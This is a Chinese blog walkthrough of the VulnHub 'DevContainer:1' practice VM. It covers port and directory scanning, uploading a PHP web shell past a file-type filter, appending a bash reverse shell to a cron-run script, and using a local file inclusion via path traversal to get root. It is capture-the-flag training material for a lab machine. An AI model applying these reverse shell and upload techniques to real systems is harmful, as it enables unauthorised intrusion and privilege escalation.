VulnHub渗透测试实战靶场 - DevContainer:1

最新推荐文章于 2024-04-27 12:56:11 发布
最新推荐文章于 2024-04-27 12:56:11 发布
阅读量495 收藏 2
点赞数
分类专栏: # VulnHub 文章标签: VulnHub 渗透测试 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyj20010728/article/details/119881370
版权

VulnHub渗透测试实战靶场 - DevContainer:1

题目描述

Goal: 2 flagas
Difficulty: Easy-intermediate
Information: Your feedback is appreciate:
Twitter: @0x04E1

This works better with VirtualBox rather than VMware

环境下载

DevContainer:1靶机搭建

  1. 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
  2. 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only
  • 目标靶机的 IP 地址为:192.168.56.108
  • 攻击机的 IP 地址为:192.168.56.102

渗透测试

信息搜集

用 Nmap 扫描一下目标靶机的端口信息:sudo nmap -sS -A 192.168.56.108,发现开放了 80 端口

用 dirb 扫描一下 80 端口 web 目录:dirb http://192.168.56.108

漏洞挖掘

  • 根据 dirb 扫描结果,访问 http://192.168.56.108/upload/ 发现文件上传页面,并根据 F12 查看页面源码发现的注释,猜测存在文件上传漏洞
  • 利用 Kali 自带的 PHP-Shell,修改后缀名为允许上传的文件后缀名,再利用 burpsuite 抓包修改上传文件信息

getshell

  • 用 nc 起一个监听,访问上传的文件,成功接收到反弹的 shell
  • 将 shell 变为交互式的 shell
SHELL=/bin/bash script -q /dev/null

提权

  • 进一步查找信息,在 /var/www/html 目录下发现一个可疑目录 Maintenance-Web-Docker
  • 其中 list.sh 可写,尝试写入一个反向 shell
echo "bash -i >& /dev/tcp/192.168.56.102/4444 0>&1" >> list.sh
  • 通过查看 out.txt 我们发现每一分钟运行一次 list.sh,开启 nc 监听后等一会成功接收到反弹的 shell

Flag-1

  • 在家目录下的 user.txt 成功得到 Flag-1
  • 注意到存在一个目录 HackTools
  • 运行命令:/home/richard/HackTools/socat TCP-LISTEN\:8080\,fork TCP\:127.0.0.1\:90,并查看一下 90 端口上运行着什么
  • 访问 http://192.168.56.108:8080/,测试后发现存在文件包含漏洞

Flag-2

  • 包含之前上传的 shell,访问 http://192.168.56.108:8080/index.php?view=../../../../../../home/richard/web/upload/files/shells.php
  • 开启监听,成功接收到反弹的 shell,拿到 root 权限,成功拿到 Flag-2
H3rmesk1t
关注
专栏目录
VulnHub-Chill-Hack 1 靶场渗透实验
qq_56724121的博客
04-27 599
VulnHub-Chill-Hack 1 靶场渗透实验 一、信息收集 1、收集靶机的ip nmap来扫描存活的主机 nmap -sn 192.168.226.0/24( -v表示显示过程) 根据扫描的结果,可以继续验证目标靶机的ip 确定目标靶机地址是192.168.226.131 2、根据得到的靶机ip,继续扫描靶机相关的服务开放情况 nmap -sC -sV 192.168.226.131 -p- --min-rate=2000 -n -vv -sC –...
vulnhub-DEVCONTAINER: 1
qq_43400414的博客
07-03 278
一、环境搭建 下载地址: https://www.vulnhub.com/entry/devcontainer-1,548/ 靶场描述: Goal:2flagas Difficulty:Easy-intermediate Information:Yourfeedbackisappreciate: Twitter:@0x04E1 ThisworksbetterwithVirtualBoxratherthanVmware 配置IP地址 参考:https://www.cn...
vulnhub-DEVCONTAINER: 1-DEVCONTAINER
yutianovo的博客
09-16 560
靶机描述 Goal: 2 flagas Difficulty: Easy-intermediate Information: Your feedback is appreciate: Twitter: @0x04E1 This works better with VirtualBox rather than VMware 下载 https://www.vulnhub.com/entry/devcontainer-1,548/ 清单 信息搜集 netdiscover nmap dir 利用 文
devcontainer 靶机
m0_66299232的博客
10-05 429
9.因为他是以sudo权限开放的8080端口 说明这是root权限,我们直接再次触发第一次传入的木马,进行反弹shell,来提权。3.扫下http://192.168.1.106/upload 这个目录 ,发现文件上传路径。nmap -p- -A -T4 192.168.1.106 //探测目标靶机开放端口和服务。4.查看list.sh目录和out.txt 目录后,我直接进行反弹shell命令写入。1.扫目录发现一个/upload 是一个能上传文件的界面 ,是一个白名单的文件上传。
DevContainer 1 靶机 wp
m0_52496313的博客
10-05 665
DevContainer 1 靶机 wp
VulnHub渗透测试实战靶场 - Tomato
m0_74215510的博客
04-27 1380
靶机名称:tomato 靶机难度:中等到困难 虚拟机环境:VMware Workstation 15.x Pro(此靶机推荐使用VMware搭建) 目标:获取root shell,即(root@localhost:~#),然后获取/root下的flag 靶机地址:https://download.vulnhub.com/tomato/Tomato.ova
vuInhub靶场实战系列-prime:2
最新发布
06-08
vuInhub靶场实战系列-prime:2
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vuInhub靶场实战系列-prime:1
06-05
vuInhub靶场实战系列-prime:1
webug3.0渗透测试靶场
05-07
webug3.0渗透测试靶场!从官方虚拟机中提取出来的!代码优化,去除重复的文件!内附安装介绍及搭建工具!
Vulnhub:DEVCONTAINER: 1
分享
04-08 227
Vulnhub:DEVCONTAINER: 1。。。。
靶场(1)
HJWYYQX的博客
06-05 504
SSH–私钥泄露 即如何从外部进入最终获得root主机。 首先,攻击机是我们的kali linux。 同时开启两台虚拟机,两台设置同样的网络模式,我设置的是NAT模式,靶机没有登录密码,需要通过SSH进行远程登录 先登录kali,然后ifconfig查看ip, 用nmap嗅探端口,探测开放服务。 ...
渗透测试靶场
任浩的博客
02-15 624
sqli-labs sqli-labs包含了大多数的sql注入类型,以一种闯关模式,对于sql注入进行漏洞利用 下载地址:https://github.com/Audi-1/sqli-labs xss challenges xsschallenges是一个专对于XSS漏洞练习的在线靶场,包含了各种绕过,各种姿势的XSS利用 下载地址:http://xss-quiz.int21h.jp/ xss-labs 基于跨站脚本攻击一个漏洞靶机,也是一款基于通关形式的靶机 在线地址:http://test.x
DC-2靶场-渗透测试
negnegil的博客
06-06 722
靶机:DC-2 下载地址:https://www.vulnhub.com/entry/dc-2,311/ 下载后导入和kali相同的虚拟机平台即可 靶场的网络模式设置为桥接模式,启动 1.先以ARP扫描以下局域网内靶机的ip arp-scan -l netdiscover、nmap、msf、powershell等常用工具也可以进行主机扫描,感兴趣可自行摸索 2.使用nmap扫一下ip查看端口开放 nmap功能很强大,不仅能够扫描端口,嗅探所提供的网络服务、还能探测存货主机、简单漏洞扫描和绕过防火墙
VulnHub渗透测试实战靶场 - SICKOS: 1.1
LYJ20010728的博客
08-08 1979
VulnHub渗透测试实战靶场 - SICKOS: 1.1环境下载SICKOS: 1.1靶机搭建渗透测试信息搜集 环境下载 戳此进行环境下载 SICKOS: 1.1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l ...
VulnHub渗透测试实战靶场-HA:NARAK
LYJ20010728的博客
08-20 871
VulnHub渗透测试实战靶场-HA:NARAK环境下载HA:NARAK靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 HA:NARAK靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.140 使用 nmap 扫描开放的端口:sudo nmap -sU -Pn 192.168.
VulnHub渗透测试实战靶场 - FRISTILEAKS: 1.3
LYJ20010728的博客
08-06 1492
VulnHub渗透测试实战靶场 - FRISTILEAKS: 1.3环境下载TOPHATSEC: FRESHLY靶机搭建渗透测试信息搜集漏洞挖掘 环境下载 戳此进行环境下载 TOPHATSEC: FRESHLY靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式,虚拟机的MAC地址为:08:00:27:A5:A6:76 获取到目标靶机的IP为:192.168.246.132 渗透测试 信息搜集 用Nmap扫描一下目标靶机:sudo nmap -sS -A 192.168.246.
billu b0x靶场渗透测试
L_lemo004的博客
07-12 808
扫描IP 由于我的内网网段为31,所以我使用ipscan工具扫描31段的存活主机 发现192.168.31.16疑似靶场IP,访问看看,成功访问,界面是白胡子 页面提示我们用SQL注入获取用户名密码,在输入框尝试注入,输入admin’ ,弹出try again提示框,说明无法注入 文件包含 无法注入,我们可以尝试爆破目录看看有没有什么突破点 得到页面较多,test.php、add.php、...
VulnHub入门教程:DC-1靶场攻破指南
"DC-1 是一个专门为渗透测试学习设计的漏洞靶场,由 ins1ght 作者提供,适合初级者。靶机于2019年2月28日发布,包含五个旗标,最终目标是找到并读取 root 用户主目录中的旗标,可能需要具备 Linux 技能、熟悉 Linux ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值